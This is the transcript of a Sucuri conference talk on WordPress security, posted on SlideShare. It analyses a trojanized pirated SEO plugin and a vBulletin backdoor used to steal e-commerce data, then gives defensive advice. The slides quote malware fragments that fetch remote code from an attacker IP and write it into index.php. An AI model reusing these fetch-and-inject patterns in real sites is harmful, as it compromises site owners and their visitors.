WordPress Security - Learning From Hacks
Upcoming SlideShare
Loading in...5
×

Like this? Share it with your network

Share
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
2,134
On Slideshare
1,719
From Embeds
415
Number of Embeds
4

Actions

Shares
Downloads
13
Comments
0
Likes
0

Embeds 415

http://tonyonsecurity.com 406
http://feedly.com 5
http://us5.campaign-archive2.com 3
http://newsconsole.com 1

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide
  • Defense in depth is a pretty standard phrase used in the security world in which there is no dependency on any one control, but rather a series of controls implemented throughout the stack to ensure the integrity and security. It’s simple and effective, yet many don’t apply it for whatever reason. We’re too busy focusing on that quick solution that will end all my problems. That one plugins that will harden my entire site to the point where I won’t be able to access it and none of my plugins will work.
  • Be sure to check out Jason Cosper’s presentation earlier this evening, should be up on WordSesh soon, but he goes through some good tips on hardening your WordPress site.

Transcript

  • 1. WordPress Security Learning From Website Hacks
  • 2. This is me! Sucuri Inc. Website Security o Incident Handling o Log Analysis o o Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 3. Let’s Learn from Website Attacks Analyze some of the things we have seen in recent days/weeks, and better understand what we need to be doing as website owners. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 4. Attack Scenerios o The Art of Phishing o Stealing Credit Cards Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 5. Scenerio Uno (One) The art of Phishing Naive Users
  • 6. Attack of Opportunity o Holiday season / Holiday spirit o Did you say Free? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 7. Red Flag[s] <A href="http://www.[infecteddomain].com.au/wp -content/all-in-one-seopack%20Pro%20v2.1.zip">All in One SEO Pack V2.1 Download Link</A> Red Alert: http://www.[infecteddomain].com.au Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 8. Difference o o Pro Version? Legit Version? Modified file: aioseop_class.php Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 9. Intent o Redirection - porn or exploit kits o Target: index.php o Taking content from here: $code_txt = 'http://91.239.15.61/o1.txt’; o Placing it in the files here: $index_path = $path.'/index.php'; if(file_put_contents($index_path, $code)){ Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 10. How? o Index.php payload: o Using curl to pull content from here: $url = http://91.239.15.61/java/google.php; Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 11. Payload o Pulls content from: http://91.239.15.61/google.js - Redirection to Porn Sites http://91.239.15.61/g.php - Exploit Kits Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 12. Lesson to Be Learned o Trust but verify sources o This is not isolated to just plugins, it can happen to themes as well o This is the season in which attackers prey on our need to spend $$$ and be online. Be vigilant! o The vulnerability was the website administrator… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 13. Scenerio Dos (Two) Got e-Commerce? Leverage 3rd-party CMS applications in your stack?
  • 14. Got e-Commerce? o Business owners <3 E-commerce o CMS extensibility = WooCommerce o Quick setup of payment collection systems for goods o Awesome, right? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 15. Big Target o Credit Card = Cha-Ching o Used/shared/sold underground o Impact is catastrophic o Blacklisting o Ban o No more cash flow! No more Trust! Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 16. Cross-contamination Simple concept in which your website is attacked and infected by a neighboring site in the same environment Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 17. vBulletin o Popular CMS Application for Forums o WordPress + vBulletin Configurations Common Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 18. Scenerio o WordPress: Main website | Blog | e-Commerce o vBulletin: Forum o 1 Server Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 19. Payload Found here: /wp-admin/includes/list.php Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 20. How? o It’s about the journey folks… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 21. Scenerio o list.php? o shop.txt? Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 22. That’s Interesting /forum/ajax.php?edit= Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 23. vBulletin Plugin o Backdoor shell was installed into vBulletin giving the attacker the tools they needed to attack the WordPress installation. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 24. Dump of Users Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 25. Attack Vector o Access Control Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 26. Lessons to be Learned o Attackers are smart – surprise!!! o Cross-contamination is a real threat today! o Must be diligent across our stack! o Isolate applications if possible. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 27. What can you do? Lets get proactive!
  • 28. Harsh Reality None of the security plugins out there would have prevented either of these attacks. So much for all those hardening tips.. Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 29. Two Important Vectors o Access control o Within your control… o Software vulnerabilities o Not so much… Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 30. Defense in Depth • There is no single cure • Layered Defenses • Combination of tools and actions – Combine: Protection and Detection Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 31. Access Control o Google Authenticator – 2FA o http://wordpress.org/plugins/google-authenticator/ o Duo Security – 2FA o http://wordpress.org/plugins/duo-wordpress/ o Login Secure Solutions – Policy / Enforcement o http://wordpress.org/plugins/login-security-solution/ o Sucuri CloudProxy / Detection / Remedation - Complete Website Security o http://sucuri.net/signup Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 32. Software Vulnerabilities o Trusted Sources o Start with the repo and established communities o If you’re not a developer this is going to be beyond your reach mostly o Web Application Firewall (WAF) Plugins o Highly ineffective, evading and bypassing is easy o Cause Denial of Service attacks o SaaS based Web Application Firewall (WAF) more effective! o Sucuri CloudProxy WAF Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 33. Auditing • Know what is going on with your site – Integrity Checks – Logging in / Logging out – Changes being made • More important than half the hardening tips you read on line today • Options: – WP Security Audit log http://wordpress.org/plugins/wp-securityaudit-log/ – Sucuri Premium Plugin http://wordpress.sucuri.net Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 34. If all else fails… o Be sure you have backups… o VaultPress – WordPress Sites o Sucuri Backups – WordPress and Everything else o SaaS based Backups more effective! Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox
  • 35. Tony Perez @perezbox | @sucuri_security tony@sucuri.net #wordsesh Tony Perez, COO - Sucuri, Inc. sucuri.net @perezbox